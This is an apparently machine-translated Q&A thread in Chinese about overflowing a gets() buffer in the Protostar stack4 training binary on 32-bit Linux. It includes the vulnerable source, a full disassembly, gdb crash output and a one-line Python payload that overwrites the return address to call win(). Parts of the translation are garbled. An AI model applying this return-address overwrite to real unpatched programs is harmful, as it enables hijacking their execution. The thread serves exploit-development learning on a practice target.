我正在尝试利用此程序中的缓冲区溢出 我正在使用32位的kali_linux
#include <stdlib.h>
void win()
{
printf("code flow successfully changed\n");
}
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);
}
我使用了pattern_offset来获取应该覆盖的覆盖量:72 发生的是:EBP被覆盖,但是即使溢出了72 + 4个字节来覆盖ebp +函数地址来覆盖返回地址,EIP也不会被覆盖
EIP:0x40120f(:ret)
总是指向寄信人地址。
isassembly of section .init:
00001000 <_init>:
1000: 53 push %ebx
1001: 83 ec 08 sub $0x8,%esp
1004: e8 a7 00 00 00 call 10b0 <__x86.get_pc_thunk.bx>
1009: 81 c3 f7 2f 00 00 add $0x2ff7,%ebx
100f: 8b 83 f4 ff ff ff mov -0xc(%ebx),%eax
1015: 85 c0 test %eax,%eax
1017: 74 02 je 101b <_init+0x1b>
1019: ff d0 call *%eax
101b: 83 c4 08 add $0x8,%esp
101e: 5b pop %ebx
101f: c3 ret
Disassembly of section .plt:
00001020 <.plt>:
1020: ff b3 04 00 00 00 pushl 0x4(%ebx)
1026: ff a3 08 00 00 00 jmp *0x8(%ebx)
102c: 00 00 add %al,(%eax)
...
00001030 <gets@plt>:
1030: ff a3 0c 00 00 00 jmp *0xc(%ebx)
1036: 68 00 00 00 00 push $0x0
103b: e9 e0 ff ff ff jmp 1020 <.plt>
00001040 <puts@plt>:
1040: ff a3 10 00 00 00 jmp *0x10(%ebx)
1046: 68 08 00 00 00 push $0x8
104b: e9 d0 ff ff ff jmp 1020 <.plt>
00001050 <__libc_start_main@plt>:
1050: ff a3 14 00 00 00 jmp *0x14(%ebx)
1056: 68 10 00 00 00 push $0x10
105b: e9 c0 ff ff ff jmp 1020 <.plt>
Disassembly of section .plt.got:
00001060 <__cxa_finalize@plt>:
1060: ff a3 f0 ff ff ff jmp *-0x10(%ebx)
1066: 66 90 xchg %ax,%ax
Disassembly of section .text:
00001070 <_start>:
1070: 31 ed xor %ebp,%ebp
1072: 5e pop %esi
1073: 89 e1 mov %esp,%ecx
1075: 83 e4 f0 and $0xfffffff0,%esp
1078: 50 push %eax
1079: 54 push %esp
107a: 52 push %edx
107b: e8 22 00 00 00 call 10a2 <_start+0x32>
1080: 81 c3 80 2f 00 00 add $0x2f80,%ebx
1086: 8d 83 80 d2 ff ff lea -0x2d80(%ebx),%eax
108c: 50 push %eax
108d: 8d 83 20 d2 ff ff lea -0x2de0(%ebx),%eax
1093: 50 push %eax
1094: 51 push %ecx
1095: 56 push %esi
1096: ff b3 f8 ff ff ff pushl -0x8(%ebx)
109c: e8 af ff ff ff call 1050 <__libc_start_main@plt>
10a1: f4 hlt
10a2: 8b 1c 24 mov (%esp),%ebx
10a5: c3 ret
10a6: 66 90 xchg %ax,%ax
10a8: 66 90 xchg %ax,%ax
10aa: 66 90 xchg %ax,%ax
10ac: 66 90 xchg %ax,%ax
10ae: 66 90 xchg %ax,%ax
000010b0 <__x86.get_pc_thunk.bx>:
10b0: 8b 1c 24 mov (%esp),%ebx
10b3: c3 ret
10b4: 66 90 xchg %ax,%ax
10b6: 66 90 xchg %ax,%ax
10b8: 66 90 xchg %ax,%ax
10ba: 66 90 xchg %ax,%ax
10bc: 66 90 xchg %ax,%ax
10be: 66 90 xchg %ax,%ax
000010c0 <deregister_tm_clones>:
10c0: e8 e0 00 00 00 call 11a5 <__x86.get_pc_thunk.dx>
10c5: 81 c2 3b 2f 00 00 add $0x2f3b,%edx
10cb: 8d 8a 20 00 00 00 lea 0x20(%edx),%ecx
10d1: 8d 82 20 00 00 00 lea 0x20(%edx),%eax
10d7: 39 c8 cmp %ecx,%eax
10d9: 74 1d je 10f8 <deregister_tm_clones+0x38>
10db: 8b 82 ec ff ff ff mov -0x14(%edx),%eax
10e1: 85 c0 test %eax,%eax
10e3: 74 13 je 10f8 <deregister_tm_clones+0x38>
10e5: 55 push %ebp
10e6: 89 e5 mov %esp,%ebp
10e8: 83 ec 14 sub $0x14,%esp
10eb: 51 push %ecx
10ec: ff d0 call *%eax
10ee: 83 c4 10 add $0x10,%esp
10f1: c9 leave
10f2: c3 ret
10f3: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
10f7: 90 nop
10f8: c3 ret
10f9: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
00001100 <register_tm_clones>:
1100: e8 a0 00 00 00 call 11a5 <__x86.get_pc_thunk.dx>
1105: 81 c2 fb 2e 00 00 add $0x2efb,%edx
110b: 55 push %ebp
110c: 89 e5 mov %esp,%ebp
110e: 53 push %ebx
110f: 8d 8a 20 00 00 00 lea 0x20(%edx),%ecx
1115: 8d 82 20 00 00 00 lea 0x20(%edx),%eax
111b: 83 ec 04 sub $0x4,%esp
111e: 29 c8 sub %ecx,%eax
1120: 89 c3 mov %eax,%ebx
1122: c1 e8 1f shr $0x1f,%eax
1125: c1 fb 02 sar $0x2,%ebx
1128: 01 d8 add %ebx,%eax
112a: d1 f8 sar %eax
112c: 74 14 je 1142 <register_tm_clones+0x42>
112e: 8b 92 fc ff ff ff mov -0x4(%edx),%edx
1134: 85 d2 test %edx,%edx
1136: 74 0a je 1142 <register_tm_clones+0x42>
1138: 83 ec 08 sub $0x8,%esp
113b: 50 push %eax
113c: 51 push %ecx
113d: ff d2 call *%edx
113f: 83 c4 10 add $0x10,%esp
1142: 8b 5d fc mov -0x4(%ebp),%ebx
1145: c9 leave
1146: c3 ret
1147: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
114e: 66 90 xchg %ax,%ax
00001150 <__do_global_dtors_aux>:
1150: 55 push %ebp
1151: 89 e5 mov %esp,%ebp
1153: 53 push %ebx
1154: e8 57 ff ff ff call 10b0 <__x86.get_pc_thunk.bx>
1159: 81 c3 a7 2e 00 00 add $0x2ea7,%ebx
115f: 83 ec 04 sub $0x4,%esp
1162: 80 bb 20 00 00 00 00 cmpb $0x0,0x20(%ebx)
1169: 75 27 jne 1192 <__do_global_dtors_aux+0x42>
116b: 8b 83 f0 ff ff ff mov -0x10(%ebx),%eax
1171: 85 c0 test %eax,%eax
1173: 74 11 je 1186 <__do_global_dtors_aux+0x36>
1175: 83 ec 0c sub $0xc,%esp
1178: ff b3 1c 00 00 00 pushl 0x1c(%ebx)
117e: e8 dd fe ff ff call 1060 <__cxa_finalize@plt>
1183: 83 c4 10 add $0x10,%esp
1186: e8 35 ff ff ff call 10c0 <deregister_tm_clones>
118b: c6 83 20 00 00 00 01 movb $0x1,0x20(%ebx)
1192: 8b 5d fc mov -0x4(%ebp),%ebx
1195: c9 leave
1196: c3 ret
1197: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi
119e: 66 90 xchg %ax,%ax
000011a0 <frame_dummy>:
11a0: e9 5b ff ff ff jmp 1100 <register_tm_clones>
000011a5 <__x86.get_pc_thunk.dx>:
11a5: 8b 14 24 mov (%esp),%edx
11a8: c3 ret
000011a9 <win>:
11a9: 55 push %ebp
11aa: 89 e5 mov %esp,%ebp
11ac: 53 push %ebx
11ad: 83 ec 04 sub $0x4,%esp
11b0: e8 5b 00 00 00 call 1210 <__x86.get_pc_thunk.ax>
11b5: 05 4b 2e 00 00 add $0x2e4b,%eax
11ba: 83 ec 0c sub $0xc,%esp
11bd: 8d 90 08 e0 ff ff lea -0x1ff8(%eax),%edx
11c3: 52 push %edx
11c4: 89 c3 mov %eax,%ebx
11c6: e8 75 fe ff ff call 1040 <puts@plt>
11cb: 83 c4 10 add $0x10,%esp
11ce: 90 nop
11cf: 8b 5d fc mov -0x4(%ebp),%ebx
11d2: c9 leave
11d3: c3 ret
000011d4 <main>:
11d4: 8d 4c 24 04 lea 0x4(%esp),%ecx
11d8: 83 e4 f0 and $0xfffffff0,%esp
11db: ff 71 fc pushl -0x4(%ecx)
11de: 55 push %ebp
11df: 89 e5 mov %esp,%ebp
11e1: 53 push %ebx
11e2: 51 push %ecx
11e3: 83 ec 40 sub $0x40,%esp
11e6: e8 25 00 00 00 call 1210 <__x86.get_pc_thunk.ax>
11eb: 05 15 2e 00 00 add $0x2e15,%eax
11f0: 83 ec 0c sub $0xc,%esp
11f3: 8d 55 b8 lea -0x48(%ebp),%edx
11f6: 52 push %edx
11f7: 89 c3 mov %eax,%ebx
11f9: e8 32 fe ff ff call 1030 <gets@plt>
11fe: 83 c4 10 add $0x10,%esp
1201: b8 00 00 00 00 mov $0x0,%eax
1206: 8d 65 f8 lea -0x8(%ebp),%esp
1209: 59 pop %ecx
120a: 5b pop %ebx
120b: 5d pop %ebp
120c: 8d 61 fc lea -0x4(%ecx),%esp
120f: c3 ret
00001210 <__x86.get_pc_thunk.ax>:
1210: 8b 04 24 mov (%esp),%eax
1213: c3 ret
1214: 66 90 xchg %ax,%ax
1216: 66 90 xchg %ax,%ax
1218: 66 90 xchg %ax,%ax
121a: 66 90 xchg %ax,%ax
121c: 66 90 xchg %ax,%ax
121e: 66 90 xchg %ax,%ax
00001220 <__libc_csu_init>:
1220: 55 push %ebp
1221: e8 5b 00 00 00 call 1281 <__x86.get_pc_thunk.bp>
1226: 81 c5 da 2d 00 00 add $0x2dda,%ebp
122c: 57 push %edi
122d: 56 push %esi
122e: 53 push %ebx
122f: 83 ec 0c sub $0xc,%esp
1232: 89 eb mov %ebp,%ebx
1234: 8b 7c 24 28 mov 0x28(%esp),%edi
1238: e8 c3 fd ff ff call 1000 <_init>
123d: 8d 9d f8 fe ff ff lea -0x108(%ebp),%ebx
1243: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
1249: 29 c3 sub %eax,%ebx
124b: c1 fb 02 sar $0x2,%ebx
124e: 74 25 je 1275 <__libc_csu_init+0x55>
1250: 31 f6 xor %esi,%esi
1252: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
1258: 83 ec 04 sub $0x4,%esp
125b: 57 push %edi
125c: ff 74 24 2c pushl 0x2c(%esp)
1260: ff 74 24 2c pushl 0x2c(%esp)
1264: ff 94 b5 f4 fe ff ff call *-0x10c(%ebp,%esi,4)
126b: 83 c6 01 add $0x1,%esi
126e: 83 c4 10 add $0x10,%esp
1271: 39 f3 cmp %esi,%ebx
1273: 75 e3 jne 1258 <__libc_csu_init+0x38>
1275: 83 c4 0c add $0xc,%esp
1278: 5b pop %ebx
1279: 5e pop %esi
127a: 5f pop %edi
127b: 5d pop %ebp
127c: c3 ret
127d: 8d 76 00 lea 0x0(%esi),%esi
00001280 <__libc_csu_fini>:
1280: c3 ret
00001281 <__x86.get_pc_thunk.bp>:
1281: 8b 2c 24 mov (%esp),%ebp
1284: c3 ret
Disassembly of section .fini:
00001288 <_fini>:
1288: 53 push %ebx
1289: 83 ec 08 sub $0x8,%esp
128c: e8 1f fe ff ff call 10b0 <__x86.get_pc_thunk.bx>
1291: 81 c3 6f 2d 00 00 add $0x2d6f,%ebx
1297: 83 c4 08 add $0x8,%esp
129a: 5b pop %ebx
129b: c3 ret
答案 0 :(得分:0)
我想您可能喜欢将某些东西重定向到功能win()
使用win()
查找一个nm
函数地址:
user@protostar:/opt/protostar/bin$ nm stack4 | grep win
080483f4 T win
是的,程序会在76
崩溃,然后才能在eip
覆盖77
76
A:
user@protostar:/opt/protostar/bin$ gdb -q stack4
Reading symbols from /opt/protostar/bin/stack4...done.
(gdb) r
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0xb7eadc03 in __libc_start_main (main=Cannot access memory at address 0x41414149
) at libc-start.c:187
187 libc-start.c: No such file or directory.
in libc-start.c
(gdb)
77
A:
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/stack4
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Program received signal SIGSEGV, Segmentation fault.
0xb7ea0041 in ?? () from /lib/libc.so.6
(gdb)
请参见地址41
上的0xb7ea0041
解决方案:
user@protostar:/opt/protostar/bin$ python -c 'print "A"*76+"\xf4\x83\x04\x08"' | ./stack4
code flow successfully changed
Segmentation fault
user@protostar:/opt/protostar/bin$